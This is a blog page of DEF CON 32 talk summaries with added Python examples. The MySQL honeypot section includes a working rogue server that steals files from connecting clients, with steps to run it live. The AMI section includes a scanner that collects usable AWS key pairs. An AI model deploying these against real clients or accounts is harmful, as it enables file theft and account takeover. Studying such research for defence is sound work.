Posts Tagged ‘DefCon32’
[DefCon32] Nano Enigma: Uncovering the Secrets in eFuse Memories
Michal Grygarek and Martin Petr, embedded systems security experts at Accenture in Prague, show that eFuse-based memories used to hold sensitive data such as encryption keys are not as secure as commonly assumed. Their presentation walks through extracting confidential information from these chips with accessible tools, challenging the assumption that eFuse memories are inherently secure, and argues for stronger protection mechanisms in embedded systems.
Decoding eFuse Vulnerabilities
Martin opens by explaining the role of eFuse memories in protecting encryption keys and locking debug interfaces. Traditionally considered robust, they are susceptible to physical attack because the state of each fuse (blown or intact) can be observed directly once the die is exposed. Martin describes their journey, starting with chip decapsulation using household items such as a whetstone, demonstrating that a determined attacker can bypass the protections without advanced equipment.
Reverse-Engineering Techniques
Michal walks through the methodology: delayering the chip to expose the eFuse array, imaging it with a scanning electron microscope (SEM) rented from a local university, and reading the encryption key from the fuse states. With the key in hand, the confidentiality of the encrypted flash memory is broken. Their approach, supported by Accenture, shows how little stands between an attacker and the secret: destroying the chip in the process is no obstacle, because the encrypted flash contents can be dumped beforehand and decrypted once the key is recovered.
Implications for Embedded Security
The duo emphasizes the broader implications, noting that eFuse weaknesses threaten every device that relies on these memories for security. Martin addresses the misconception that delayering is prohibitively complex, showing that basic tools and minimal resources suffice. To encourage hands-on experimentation with these risks, they gave away decapsulated ESP32 chips during the talk.
Strengthening Protection Mechanisms
Concluding, Michal advocates obfuscating key material stored in eFuse and using alternative storage for secrets, so that reading the fuse array alone does not yield a usable key. Their work, presented at DEF CON 32, calls on vendors to reassess their reliance on eFuse and implement stronger safeguards. By sharing their techniques, Michal and Martin encourage the security community to address these overlooked weaknesses in embedded systems.
Links:
[DefCon32] The Way to Android Root: Exploiting Smartphone GPU
Xiling Gong and Eugene Rodionov, security researchers at Google, examine vulnerabilities in the kernel driver for Qualcomm’s Adreno GPU, a component present in a large share of Android devices. Their presentation covers nine exploitable flaws that lead to kernel code execution, and a novel exploit technique that bypasses Android’s Control-flow Integrity (CFI) and W^X mitigations. Xiling and Eugene highlight the risk concentrated in GPU drivers and propose actionable mitigations for mobile security.
Uncovering Adreno GPU Vulnerabilities
Xiling opens with their analysis of the Adreno GPU kernel module found in Qualcomm-based devices. The research identified nine vulnerabilities, including race conditions and integer overflows, all reachable from an unprivileged app, since the driver exposes its interface to every application that renders graphics. Found through targeted fuzzing, these flaws expose a large and complex attack surface, making the driver a prime target for local privilege escalation.
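Both bug classes named above, the integer overflow and the race, come down to a handler trusting a user-controlled value at the wrong moment. The following is an added example written for this page, not code from the talk or from the Adreno driver; it emulates the unsigned 32-bit arithmetic a C ioctl handler performs (Python integers do not wrap), and the request limit, the field names and the modelled racing thread are all constructed for illustration.

```python
"""Two ways an ioctl handler can be fooled by a user-supplied size.

Added example for this page (not the Adreno driver's code). The request
limit, field names and the racing attacker are constructed to illustrate
the bug classes; u32 arithmetic is emulated explicitly because Python
integers do not wrap.
"""
from typing import Callable, Optional

U32_MASK = 0xFFFFFFFF
MAX_MAP_BYTES = 64 * 1024 * 1024      # hypothetical per-request ceiling


def u32(x: int) -> int:
    """Truncate to unsigned 32-bit, as C does silently on overflow."""
    return x & U32_MASK


def vulnerable_validate(entry_size: int, entry_count: int) -> Optional[int]:
    """Multiply first, check second: a wrapped product passes the check.

    Returns the byte count the handler will allocate, or None if rejected.
    A later loop that still walks entry_count entries then runs past the
    (far too small) allocation.
    """
    total = u32(entry_size * entry_count)
    if total > MAX_MAP_BYTES:
        return None
    return total


def hardened_validate(entry_size: int, entry_count: int) -> Optional[int]:
    """Bound the count before multiplying, so the product cannot wrap."""
    if entry_size == 0 or entry_count == 0:
        return None
    if entry_count > MAX_MAP_BYTES // entry_size:
        return None
    return entry_size * entry_count


def double_fetch_handler(read_user_len: Callable[[], int]) -> int:
    """Validate a length copied from user memory, then copy it again.

    read_user_len() models copy_from_user() of a header the calling app
    still owns; between the two fetches another thread can rewrite it.
    """
    length = read_user_len()
    if length > MAX_MAP_BYTES:
        raise PermissionError("rejected")
    length = read_user_len()        # second fetch: the validated value is gone
    return length


def single_fetch_handler(read_user_len: Callable[[], int]) -> int:
    """Copy once, validate the kernel-side copy, use only that copy."""
    length = read_user_len()
    if length > MAX_MAP_BYTES:
        raise PermissionError("rejected")
    return length


def racing_attacker(benign: int, malicious: int) -> Callable[[], int]:
    """Model a thread that flips the shared header between two kernel reads."""
    values = iter((benign, malicious))
    return lambda: next(values, malicious)


if __name__ == "__main__":
    print("wrapped product accepted:", vulnerable_validate(0x10000, 0x10000))
    print("hardened verdict:", hardened_validate(0x10000, 0x10000))
    print("double fetch uses:", double_fetch_handler(racing_attacker(4096, 2 ** 31)))
    print("single fetch uses:", single_fetch_handler(racing_attacker(4096, 2 ** 31)))
```

The hardened check bounds the count by the quotient before multiplying, which is what overflow-safe helpers such as the Linux kernel's check_mul_overflow() give you in C; the single-fetch version reads user memory once and validates its private copy, which is the only copy later code may use.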
Novel Exploit Techniques
Eugene describes the exploit technique, which leverages the GPU’s own memory-management features to obtain an arbitrary physical memory read/write primitive. Starting from a race condition, they achieved kernel code execution with a 100% success rate on a device that was fully patched at the time of the research. The technique bypasses Control-flow Integrity (CFI) and Write XOR Execute (W^X), demonstrating the potency of GPU-based attacks and the need for robust defenses.
Challenges in GPU Security
The duo highlights why GPU drivers are hard to secure: they are reachable from untrusted code and are performance-critical. Xiling notes that on Android the user-mode GPU driver runs inside the application’s own process and talks to the kernel driver directly, rather than through an isolated GPU service reached over IPC, which makes every app a direct peer of the kernel driver. Their fuzzing, tailored for concurrent code, showed how hard these vulnerabilities are to reproduce and mitigate, underscoring the need for more advanced testing.
Proposing Robust Mitigations
Concluding, Eugene suggests moving GPU handling out of process and adopting memory-safe languages to reduce the number of vulnerabilities. Their work, published via Google’s Android security research portal, calls on vendors to limit the attack surface. By sharing their exploit techniques, Xiling and Eugene encourage the community to strengthen mobile security against evolving threats.
Links:
[DefCon32] Atomic Honeypot: A MySQL Honeypot That Drops Shells
Alexander Rubin and Martin Rakhmanov, security engineers on Amazon Web Services’ RDS Red Team, present a MySQL honeypot that attacks back. Leveraging CVE-2023-21980 and CVE-2024-21096, their “Atomic Honeypot” exploits the attackers’ own systems and surfaces new attack vectors in the process. Alexander and Martin demonstrate how this active-defense mechanism turns the tables on adversaries targeting database servers.
Designing an Active Defense Honeypot
Alexander introduces the Atomic Honeypot, a high-interaction MySQL server that looks like a legitimate database in order to attract bots. Unlike a passive honeypot, it exploits vulnerabilities in MySQL’s client programs (CVE-2023-21980) and in the mysqldump utility (CVE-2024-21096) to achieve remote code execution on the attacker’s machine. Their approach, detailed at DEF CON 32, chains three vulnerabilities, one of them an arbitrary file read, to retrieve and analyze the attacker’s tooling before counterattacking.
Exploiting Attacker Systems
Martin explains the mechanics, focusing on the fact that the MySQL protocol lets the server drive the client: a server can, for instance, ask the connecting client to send it a local file. By running a rogue server, they turned attacker connections into command injections against the attackers’ own hosts and downloaded the Python scripts those attackers were using for password brute-forcing and data exfiltration. Studying the scripts let Alexander and Martin observe attacker behavior directly and revealed two previously unknown MySQL attack vectors.
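The protocol feature Martin describes is concrete enough to show on the wire. The following is an added example for this page, not the Atomic Honeypot’s code: it builds the handshake a rogue MySQL server sends, the 0xFB request that asks the client for a file, and the parser for the file data the client streams back; the server version string, the requested path and the “captured” client bytes are constructed. It shows the arbitrary-file-read primitive only; the CVE-specific command injection the talk layered on top of it is not reproduced.

```python
"""Server-initiated file read over the MySQL wire protocol.

Added example for this page, not the Atomic Honeypot's code. It builds the
packets a rogue server needs so that a client which connects with
LOAD DATA LOCAL enabled (mysql, mysqldump, or a brute-forcing script using a
client library) sends the server a file of the server's choosing. The server
version string and the "captured" client bytes are constructed.
"""
import struct

CLIENT_LOCAL_FILES = 0x00000080
CLIENT_PROTOCOL_41 = 0x00000200
CLIENT_SECURE_CONNECTION = 0x00008000
CLIENT_PLUGIN_AUTH = 0x00080000
SERVER_STATUS_AUTOCOMMIT = 0x0002


def packet(seq: int, payload: bytes) -> bytes:
    """Frame a payload: 3-byte little-endian length, 1-byte sequence id."""
    if len(payload) >= 0xFFFFFF:
        raise ValueError("multi-packet payloads not handled in this demo")
    return len(payload).to_bytes(3, "little") + bytes([seq & 0xFF]) + payload


def handshake_v10(conn_id: int = 1, scramble: bytes = b"\x01" * 20) -> bytes:
    """Initial handshake (protocol 10) advertising CLIENT_LOCAL_FILES.

    Advertising the flag is what makes a willing client honour the later
    file request; the scramble is irrelevant because any login is accepted.
    """
    caps = (CLIENT_LOCAL_FILES | CLIENT_PROTOCOL_41
            | CLIENT_SECURE_CONNECTION | CLIENT_PLUGIN_AUTH)
    payload = (
        b"\x0a"                                  # protocol version
        + b"8.0.0-honeypot\x00"                  # server version, NUL-terminated
        + struct.pack("<I", conn_id)
        + scramble[:8] + b"\x00"                 # auth-plugin-data part 1 + filler
        + struct.pack("<H", caps & 0xFFFF)       # capability flags, low 16 bits
        + b"\x21"                                # charset utf8_general_ci
        + struct.pack("<H", SERVER_STATUS_AUTOCOMMIT)
        + struct.pack("<H", caps >> 16)          # capability flags, high 16 bits
        + bytes([len(scramble) + 1])             # auth-plugin-data length incl. NUL
        + b"\x00" * 10                           # reserved
        + scramble[8:] + b"\x00"                 # auth-plugin-data part 2 (13 bytes)
        + b"mysql_native_password\x00"
    )
    return packet(0, payload)


def ok_packet(seq: int) -> bytes:
    """OK: header 0x00, affected rows 0, last insert id 0, status, warnings."""
    return packet(seq, b"\x00\x00\x00" + struct.pack("<HH", SERVER_STATUS_AUTOCOMMIT, 0))


def local_infile_request(seq: int, path: str) -> bytes:
    """The server's answer to a COM_QUERY: 0xFB followed by the file name.

    Nothing in the client's query needs to mention LOAD DATA; the client
    trusts the server to say which file it wants.
    """
    return packet(seq, b"\xfb" + path.encode())


def reassemble_client_file(stream: bytes) -> bytes:
    """Parse the client's reply to a file request.

    The client streams the file as consecutive packets and signals the end
    with an empty packet; everything up to that marker is file content.
    """
    out = bytearray()
    pos = 0
    while pos + 4 <= len(stream):
        length = int.from_bytes(stream[pos:pos + 3], "little")
        pos += 4
        if length == 0:
            return bytes(out)
        out += stream[pos:pos + length]
        pos += length
    raise ValueError("truncated stream: no terminating empty packet")


def rogue_server_turn(state: str, seq: int, payload: bytes, want: str):
    """One step of the honeypot's side of the conversation.

    Returns (next_state, bytes_to_send). States: 'auth' (waiting for the
    handshake response), 'cmd' (waiting for a command), 'file' (receiving
    the requested file).
    """
    if state == "auth":                 # accept any credentials
        return "cmd", ok_packet(seq + 1)
    if state == "cmd":
        if payload[:1] == b"\x03":      # COM_QUERY: answer with a file request
            return "file", local_infile_request(seq + 1, want)
        if payload[:1] == b"\x01":      # COM_QUIT
            return "done", b""
        return "cmd", ok_packet(seq + 1)
    if state == "file":
        if len(payload) == 0:           # end of file: acknowledge, back to commands
            return "cmd", ok_packet(seq + 1)
        return "file", b""              # more file data, nothing to send yet
    return "done", b""


if __name__ == "__main__":
    # Constructed client reply to a request for /root/brute.py
    captured = packet(2, b"import pymysql\n") + packet(3, b"# brute loop\n") + packet(4, b"")
    print(reassemble_client_file(captured).decode())
```

To use it live, wrap rogue_server_turn() around a TCP listener on port 3306, feed it each client packet’s sequence number and payload, and send back whatever it returns. A client started with local-infile disabled refuses the 0xFB request, which is also the setting a defender should enforce on any tool that connects to databases it does not control.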
Ethical and Practical Implications
The duo addresses the ethics of active defense, stressing responsible use so as not to cause collateral damage. The honeypot needs no specialized tools: a deliberately exposed MySQL instance is enough for researchers to reproduce their findings. Martin notes, however, that Oracle’s recent patches to the client programs narrow the window in which the technique works, so the community should experiment soon.
Future of Defensive Security
Concluding, Alexander advocates integrating active defense into security strategy, highlighting the honeypot’s ability to yield actionable intelligence. Their work, supported by AWS, invites researchers to explore similar countermeasures and strengthen database security against persistent bot attacks. By sharing their exploit chain, Alexander and Martin open the way for proactive defense mechanisms.
Links:
[DefCon32] Unsaflok: Hacking Millions of Hotel Locks
Lennert Wouters (KU Leuven) and Ian Carroll (an application security researcher) unveil critical vulnerabilities in dormakaba’s Saflok hotel lock system, which affect around three million doors worldwide. Their presentation details the reverse engineering that let them forge keycards, exposing flaws in the proprietary encryption and key derivation functions. Lennert and Ian also discuss their responsible-disclosure process and give hotel guests practical advice for checking whether a lock has been patched.
Uncovering Saflok Vulnerabilities
Lennert begins by explaining the Saflok system’s reliance on MIFARE Classic cards, deployed in hotels worldwide including many of Las Vegas’s roughly 150,000 hotel rooms. By reverse-engineering the proprietary key derivation and encryption algorithms, Lennert and Ian can produce two forged keycards from any single card issued at a property: tapping the first rewrites part of the lock’s data and tapping the second opens it, on any room, overriding the deadbolt as well. Their findings reveal systemic weaknesses in a decades-old system that had never previously been publicly scrutinized by researchers.
Exploitation Techniques
Ian details the technical approach, which involved analyzing the Saflok front-desk software and the lock hardware to understand its protections. Starting from a low-privilege guest card, they derive the keys needed to forge cards with master-level access. The demonstration, building on prior work on Onity and VingCard locks, underscores how easily an unpatched system can be compromised, with direct consequences for guest safety and property security.
Responsible Disclosure and Mitigation
The duo disclosed the findings to dormakaba in September 2022, prompting mitigations that include a move to MIFARE Ultralight C cards and encoders with a secure element. Lennert discusses the difficulty of patching millions of locks, noting that as long as legacy encoders remain in service they can still issue the vulnerable MIFARE Classic cards. dormakaba has been rolling out the fixes since, but full deployment remains ongoing.
Empowering Guest Safety
Concluding, Ian offers practical guidance for guests: reading the keycard with an NFC reader app on a phone shows its card type, and a MIFARE Classic card indicates a lock that is likely still unpatched while a MIFARE Ultralight C card indicates one that has likely been upgraded. The presentation, praised by peers such as Iceman, calls for continued scrutiny of electronic lock systems. By sharing their methodology, Lennert and Ian help the security community strengthen hospitality security against emerging threats.
Links:
[DefCon32] AIxCC Closing Ceremonies
Perry Adams and Andrew Carney, representatives from DARPA and ARPA-H, preside over the closing ceremonies of the AI Cyber Challenge (AIxCC) at DEF CON 32. Their presentation celebrates the innovative efforts of participants who developed AI-driven systems to detect and patch software vulnerabilities, emphasizing the critical role of secure software in safeguarding global infrastructure. Perry and Andrew highlight the competition’s impact, announce finalists, and inspire continued collaboration in cybersecurity.
The Vision of AIxCC
Perry opens by reflecting on the AIxCC’s inception, announced at the previous DEF CON, aiming to harness AI to secure critical infrastructure. With over 12,000 visitors to the AIxCC village, the challenge engaged a diverse community in building systems to identify and fix software flaws. Perry underscores the urgency of this mission, given the pervasive vulnerabilities in software underpinning essential services like power grids and healthcare systems.
Recognizing Team Achievements
Andrew highlights standout teams, such as Team Lacrosse for their memorable patch and Team Atlanta for their innovative SQLite findings. The ceremony acknowledges the creative use of large language models (LLMs) and fuzzing techniques by participants. By sharing lessons learned, teams like Trail of Bits contribute to the broader cybersecurity community, fostering transparency and collective progress in tackling software vulnerabilities.
Impact on Critical Infrastructure
The duo emphasizes the broader implications of AIxCC, noting that insecure software threatens global stability. Perry and Andrew praise competitors for developing systems that autonomously detect and mitigate vulnerabilities, reducing reliance on manual processes. Their work aligns with DARPA’s mission to advance technologies that protect national and global infrastructure from cyber threats.
Looking Ahead to Finals
Concluding, Perry announces the finalists, each awarded $2 million and a place in the final round at DEF CON 33 in 2025. Andrew encourages ongoing engagement, promising detailed scoring feedback to participants. Their call to action invites researchers to refine AI-driven security tooling, working toward a more resilient digital ecosystem through collaborative innovation.
Links:
[DefCon32] Breaking the Beam: Exploiting VSAT Modems from Earth
Johannes Willbold, Moritz Schloegel, and Robin Bisping, researchers focused on satellite communications, expose vulnerabilities in VSAT modems, specifically the Newtec MDM2200. Their presentation details reverse-engineering efforts and novel signal injection attacks using software-defined radios (SDRs). By exploiting these systems, Johannes, Moritz, and Robin highlight the expanded attack surface of satellite communications, urging improved security for remote connectivity.
Reverse-Engineering VSAT Modems
Johannes outlines their approach to dissecting the MDM2200’s software stack, uncovering zero-day vulnerabilities. By analyzing firmware, they identified flaws that could allow remote code execution. This meticulous reverse-engineering, part of a broader project published at ACM WiSec 2024, reveals systemic weaknesses in VSAT systems critical for maritime and crisis communications.
Signal Injection Attacks
Moritz details their SDR-based attacks: signals injected at the modem’s antenna from a ground-based transmitter deliver a bogus firmware update or open a root shell. Unlike the 2022 Viasat incident, which went through the operator’s ground network, their method works entirely over the air from Earth with no foothold in any network, which broadens the potential for remote exploitation considerably.
Implications for Satellite Security
Robin discusses the real-world impact, noting that an outdated Linux kernel (version 2.6.3 on the MDM2200) and the poor fit of protections such as IPsec to high-latency satellite links both widen the exposure. Their end-to-end attack demonstrates that compromising a satellite modem is feasible and could disrupt critical communications. The researchers stress the urgency of updating VSAT security practices to protect remote regions that depend on these links.
Call for Robust Defenses
Concluding, Johannes advocates modern transport security, such as TLS in preference to IPsec, together with regular firmware updates to secure VSAT systems. Their work, soon to be published in full, invites further research into these weaknesses. By demonstrating practical attacks, Johannes, Moritz, and Robin urge stakeholders to prioritize satellite communication security to safeguard global connectivity.
Links:
- None
[DefCon32] AWS CloudQuarry: Digging for Secrets in Public AMIs
Eduard Agavriloae and Matei Josephs, security researchers from KPMG Romania and Syncubes, present their investigation into secrets left behind in public Amazon Machine Images (AMIs). Their project scanned 3.1 million AMIs and uncovered exposed AWS access credentials that could lead to account takeover. Eduard and Matei share their methodology and advocate robust cloud security practices to mitigate these threats.
Uncovering Secrets in Public AMIs
Eduard opens by detailing their CloudQuarry project, which scanned millions of public AMIs using tools like ScoutSuite. They discovered critical findings, such as exposed access keys, that could enable attackers to compromise AWS accounts. Supported by KPMG Romania, Eduard and Matei’s research highlights the pervasive issue of misconfigured cloud resources, a problem they believe will persist due to human error.
Methodologies and Tools
Matei explains their approach, leveraging automated tools to identify public AMIs and extract sensitive data. Their analysis revealed credentials embedded in AMIs, often overlooked by organizations. By responsibly disclosing findings to affected parties, Eduard and Matei avoided exploiting these keys, demonstrating ethical restraint while highlighting the potential for malicious actors to cause widespread damage.
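The scanning step is easier to picture with code. The following is an added example for this page, not the CloudQuarry tooling: a filesystem sweep for access key IDs and secret keys of the kind you would run over a mounted snapshot of a public AMI, with demo() building a small constructed image that uses AWS’s documentation placeholder keys. Enumerating the AMIs themselves (for instance with boto3’s describe_images(ExecutableUsers=['all'])) and mounting each volume is left out.

```python
"""Sweep a mounted AMI (or any directory tree) for AWS credentials.

Added example for this page, not the CloudQuarry tooling. The regexes
target long-term access keys (AKIA...), temporary keys (ASIA...) and secret
keys that sit next to a naming hint; demo() builds a small constructed
filesystem using AWS's documentation placeholder keys and scans it.
"""
import re
import tempfile
from pathlib import Path
from typing import Dict, List, Tuple

ACCESS_KEY_RE = re.compile(r"(?<![A-Z0-9])((?:AKIA|ASIA)[0-9A-Z]{16})(?![A-Z0-9])")
# A secret key is 40 chars of the base64 alphabet; demand a nearby hint so
# that commit hashes and other random strings are not reported.
SECRET_KEY_RE = re.compile(
    r"(?i)(?:aws_secret_access_key|secret_access_key|aws_secret_key|aws_secret)"
    r"[^\S\n]*[=:][^\S\n]*['\"]?([A-Za-z0-9/+=]{40})(?![A-Za-z0-9/+=])"
)


def scan_text(text: str, origin: str) -> List[Dict[str, str]]:
    """Report every credential-looking token in one file's contents."""
    hits = []
    for m in ACCESS_KEY_RE.finditer(text):
        hits.append({"type": "access_key_id", "value": m.group(1), "file": origin,
                     "lifetime": "temporary" if m.group(1).startswith("ASIA") else "long-term"})
    for m in SECRET_KEY_RE.finditer(text):
        hits.append({"type": "secret_access_key", "value": m.group(1), "file": origin})
    return hits


def scan_tree(root: Path, max_bytes: int = 8 * 1024 * 1024) -> List[Dict[str, str]]:
    """Walk the tree; decode as latin-1 so binaries are scanned byte-for-byte."""
    hits = []
    for path in sorted(root.rglob("*")):
        if path.is_symlink() or not path.is_file() or path.stat().st_size > max_bytes:
            continue
        text = path.read_bytes().decode("latin-1")
        hits.extend(scan_text(text, path.relative_to(root).as_posix()))
    return hits


def pair_credentials(hits: List[Dict[str, str]]) -> List[Tuple[str, str, str]]:
    """Key ID + secret found in the same file is a directly usable pair."""
    by_file: Dict[str, Dict[str, List[str]]] = {}
    for h in hits:
        by_file.setdefault(h["file"], {}).setdefault(h["type"], []).append(h["value"])
    pairs = []
    for origin, found in by_file.items():
        for key_id in found.get("access_key_id", []):
            for secret in found.get("secret_access_key", []):
                pairs.append((key_id, secret, origin))
    return pairs


def build_sample_image(root: Path) -> None:
    """Constructed sample of what a careless AMI leaves behind."""
    files = {
        "home/ubuntu/.aws/credentials": (
            "[default]\n"
            "aws_access_key_id = AKIAIOSFODNN7EXAMPLE\n"
            "aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n"),
        "root/.bash_history": (
            "export AWS_ACCESS_KEY_ID=ASIAIOSFODNN7EXAMPLE\n"
            "aws s3 sync /var/backups s3://acme-prod-backups/\n"),
        "opt/app/README.md": (
            "Built from commit 1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b\n"
            "secret: rotated, see vault\n"),
    }
    for rel, content in files.items():
        p = root / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(content)
    # a compiled agent with the key baked in; NUL bytes must not stop the scan
    (root / "opt/app/agent.bin").write_bytes(b"\x7fELF\x00\x00AKIAIOSFODNN7EXAMPLE\x00")


def demo():
    """Scan the constructed image; returns (hits, pairs)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_sample_image(root)
        hits = scan_tree(root)
        return hits, pair_credentials(hits)


if __name__ == "__main__":
    found, usable = demo()
    for h in found:
        print(h)
    print("usable pairs:", usable)
```

A key ID on its own is not a working credential but still identifies the account; a pair in one file is. Treat a pair as live and report it: the talk’s authors disclosed without exploiting the keys, and calling the API with a found pair “just to check” is already use of a credential that is not yours.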
Risks of Account Takeover
The duo describes the consequences of exposed credentials: unauthorized access, data breaches, or ransomware. They disclosed their findings to the affected companies, asking for nothing more than a T-shirt in return, which underscores how cheaply public AMIs can be mined by anyone. Eduard describes the adrenaline rush of discovering such a key, a measure of what is at stake in cloud security.
Strengthening Cloud Security
Concluding, Matei advocates for enhanced configuration reviews and automated monitoring to prevent AMI exposures. Their collaborative approach, inviting community feedback, reinforces the importance of collective vigilance in securing cloud environments. By sharing their tools and lessons, Eduard and Matei empower organizations to fortify their AWS deployments against emerging threats.
Links:
[DefCon32] DEF CON Unplugged: Cocktails & Cyber with Jeff & Jen
Jen Easterly, Director of CISA, and Jeff Moss, founder of DEF CON, hold a candid “Ask Me Anything” session that blends mixology with cybersecurity. Their informal dialogue, set against Jen’s cocktail-making, addresses pressing issues such as cyber liability and secure software development. With Jeff serving on CISA’s Cybersecurity Advisory Committee and Jen leading the agency, the pair offer a distinctive perspective on fostering a secure digital ecosystem through collaboration and accountability.
Navigating Cyber Liability
Jen and Jeff tackle a question on cyber liability, acknowledging its complexity: legal frameworks focus on proximate causes, such as the human error that let a ransomware attack in, rather than on root causes. Jen emphasizes the need for a cultural shift toward security, referencing the Cyber Safety Review Board’s report and its emphasis on vendor accountability. Their discussion underscores the difficulty of legislating liability in the absence of a major incident that forces change.
Building a Secure Ecosystem
The duo explores levers for enhancing cybersecurity, such as fostering a culture of responsibility among software vendors. Jen highlights the importance of product differentiation through secure development practices, while Jeff stresses the role of community engagement in shaping policy. Their dialogue, enriched by real-world examples, advocates for proactive measures to prevent devastating cyberattacks.
Community Engagement and Collaboration
Reflecting on DEF CON’s role, Jen shares her enthusiasm for the conference as a hub for hacker innovation. She and Jeff emphasize the value of open dialogue, as seen in their AMA format, to bridge gaps between government and the hacker community. By encouraging questions, they foster a collaborative environment where ideas can shape future cybersecurity strategies.
Future Directions for Cybersecurity
Concluding, Jen and Jeff call for sustained efforts to protect critical capabilities from malicious actors, including nation-states and criminals. Their session, blending humor with policy insights, inspires attendees to contribute to a more secure digital landscape through shared responsibility and innovative thinking.
Links:
[DefCon32] Secret Life of Rogue Device: Lost IT Assets on the Public Marketplace
Matthew Bryant, a seasoned security researcher and red team leader at Snap, unveils a startling investigation into the underground market for rogue IT assets. His presentation explores how sensitive devices—employee laptops, hardware prototypes, and even classified government systems—end up on public marketplaces. Through innovative techniques like scraping millions of online listings and reverse-engineering obfuscated apps, Matthew reveals the scale of this issue and its implications for organizational security.
The Scope of Rogue Devices
Matthew begins by defining rogue devices as assets that should never be resold, such as corporate laptops or early-stage hardware prototypes. His research, conducted with support from Snap and inspired by the YouTube channel AppleDemo’s work on prototype iPhones, involved analyzing over 150 million images from Western and Eastern secondhand markets. Matthew’s findings expose a thriving trade in sensitive equipment, much of it originating from e-waste recyclers or lax supply chain controls.
Technical Challenges and Innovations
To uncover these devices, Matthew employed creative methodologies, including an OCR cluster built from repurposed iPhones to process listing images. He also reverse-engineered Chinese marketplace apps, navigating their obfuscation to extract data. These efforts revealed employee laptops with sensitive data, prototype iPhones, and even government servers on platforms like eBay. Matthew’s approach highlights the ingenuity required to track assets across global, often opaque, marketplaces.
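Matching listings against what an organization actually owns is where the OCR output becomes useful, and the matching has to absorb OCR’s characteristic mistakes. The following is an added example for this page, not Matthew’s pipeline: it folds confusable glyphs (0/O/Q/D, 1/I/L, 5/S, 8/B, 2/Z, 6/G) onto one representative before comparing listing text with an asset inventory; the inventory, the listings and the asset statuses are constructed.

```python
"""Match OCR'd marketplace listings against an asset inventory.

Added example for this page, not Matthew's pipeline. OCR engines routinely
confuse 0/O/Q/D, 1/I/L, 5/S, 8/B, 2/Z and 6/G, so an exact search for a
serial number misses listings; folding every confusable glyph onto a single
representative before comparing recovers them. Inventory and listings are
constructed.
"""
import re
from typing import Dict, List

# every glyph in a confusion group is folded onto one representative
_FOLD = str.maketrans({"O": "0", "Q": "0", "D": "0", "I": "1", "L": "1",
                       "S": "5", "B": "8", "Z": "2", "G": "6"})
# candidate serials / asset tags: 5+ alphanumerics, hyphens allowed inside
TOKEN_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9-]{4,}")


def canonical(token: str) -> str:
    """Upper-case, drop punctuation, fold confusable glyphs."""
    return re.sub(r"[^A-Z0-9]", "", token.upper()).translate(_FOLD)


def index_inventory(inventory: Dict[str, dict]) -> Dict[str, List[str]]:
    """Canonical serial / asset tag -> asset ids that carry it."""
    index: Dict[str, List[str]] = {}
    for asset_id, meta in inventory.items():
        for field in ("serial", "asset_tag"):
            index.setdefault(canonical(meta[field]), []).append(asset_id)
    return index


def find_listed_assets(listings: List[str], inventory: Dict[str, dict]) -> List[dict]:
    """Every token in every listing that folds onto an inventory entry."""
    index = index_inventory(inventory)
    hits = []
    for i, text in enumerate(listings):
        for m in TOKEN_RE.finditer(text):
            for asset_id in index.get(canonical(m.group(0)), []):
                hits.append({"listing": i, "token": m.group(0), "asset_id": asset_id,
                             "status": inventory[asset_id]["status"]})
    return hits


# Constructed inventory: what the organisation believes happened to each asset.
INVENTORY = {
    "LT-0041": {"model": "Dell Latitude 5420", "serial": "7GBKQ33",
                "asset_tag": "ACME-00417", "status": "retired; sent to recycler 2023-11"},
    "SRV-0007": {"model": "HPE ProLiant DL380", "serial": "CZJ1050N8Q",
                 "asset_tag": "ACME-00988", "status": "in service"},
}

# Constructed listing text as an OCR pass would produce it from the photos.
LISTINGS = [
    "Dell Latitude 5420 i5 16GB, service tag 7G8KQ33, corporate sticker ACME-004I7 still attached",
    "HPE DL380 Gen10 2U server SN CZJl050NBQ, pulled from a datacenter, works great",
    "Lenovo ThinkPad T14 SN PF2X4K7Y no charger",
]

if __name__ == "__main__":
    for hit in find_listed_assets(LISTINGS, INVENTORY):
        print(hit)
```

Folding is deliberately lossy, so a large inventory will produce the occasional collision; treat a hit as a lead to confirm against the listing photos, and weight it by the asset’s status: a device recorded as destroyed that turns up for sale points straight at the disposal chain, while one recorded as in service suggests theft or a mislabelled inventory.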
Supply Chain and E-Waste Vulnerabilities
Delving deeper, Matthew identifies supply chain leaks and e-waste mismanagement as primary sources of rogue devices. Companies assume discarded hardware is destroyed, but recyclers often resell functional equipment, such as “50 good iPhones,” for profit. This creates opportunities for attackers to acquire sensitive assets. Matthew stresses the need for organizations to enforce strict destruction protocols and monitor secondary markets to prevent leaks.
Strengthening Organizational Defenses
Concluding, Matthew urges companies to trace their assets’ lifecycle rigorously, from procurement to disposal. By identifying leak sources through marketplace analysis, organizations can close vulnerabilities. His work, enriched by collaborations with underground collector communities, underscores the importance of proactive monitoring and robust supply chain security to safeguard sensitive data and hardware.
Links:
[DefCon32] A Shadow Librarian: Fighting Back Against Encroaching Capitalism
Daniel Messe, a seasoned librarian, delivers a passionate call to action against the corporatization of public libraries. Facing challenges like book bans, inflated eBook prices, and restricted access to academic research, Daniel shares his journey as a “shadow librarian,” using quasi-legal methods to ensure equitable access to knowledge. His talk inspires attendees to join the fight for open information in an era of digital gatekeeping.
The Plight of Public Libraries
Daniel opens by highlighting the existential threats to libraries, including censorship and corporate exploitation. He describes how publishers impose exorbitant eBook licensing fees, rendering digital content unaffordable for libraries. Book bans, particularly targeting marginalized voices, further erode access. Daniel’s narrative underscores the library’s role as a public good, now undermined by profit-driven models.
Shadow Librarianship in Action
Drawing from three decades of library work, Daniel recounts his efforts to bypass restrictive systems. By digitizing out-of-print materials and sharing banned books, he ensures access for underserved communities. His methods, while ethically driven, skirt legal boundaries, reflecting a commitment to serving patrons over corporate interests. Daniel’s stories, including providing banned books to struggling youth, resonate deeply.
Empowering Community Action
Daniel encourages attendees to become shadow librarians, emphasizing that anyone can contribute by sharing knowledge. He advocates for scanning and distributing unavailable materials, challenging unconstitutional bans, and supporting patrons in need. His lack of a formal library degree, yet extensive impact, illustrates that passion and action outweigh credentials in this fight.
Building a Knowledge Commons
Concluding, Daniel envisions a future where communities reclaim access to information. He urges collective resistance against corporate control, drawing parallels to hacker ethics of openness and collaboration. By sharing resources and skills, anyone can become a librarian for their community, ensuring knowledge remains a public right rather than a commodity.
Links:
- None